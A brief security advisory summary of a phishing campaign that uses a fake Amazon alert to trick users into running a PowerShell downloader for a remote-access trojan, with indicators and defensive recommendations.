A recent phishing campaign has been uncovered that uses a counterfeit Amazon security alert to deceive victims into executing a PowerShell command. This command downloads a harmful file named mysql.exe, which is actually the HarborWatch Agent RAT. Once activated, the malware communicates with a command-and-control server, transmitting information from the infected host. The campaign cleverly employs look-alike domains and relies on users to inadvertently infect themselves, bypassing conventional attachment-based detection methods. Investigations have traced the operation from the spoofed sender address to the malicious domains, the PowerShell downloader, and ultimately the malware payload. Analysis has revealed that mysql.exe communicates with a server at IP address 185.193.127.44, utilizing specific API paths. Organizations are advised to block these malicious domains and IPs, restrict PowerShell execution, and enhance email security measures to prevent brand impersonation. In case of detection, affected systems should be isolated, the malware process terminated, and forensic evidence collected. Users should be informed about the phishing tactic, and defenses updated to counter similar threats.
How does a fake Amazon alert deliver HarborWatch Agent RAT?
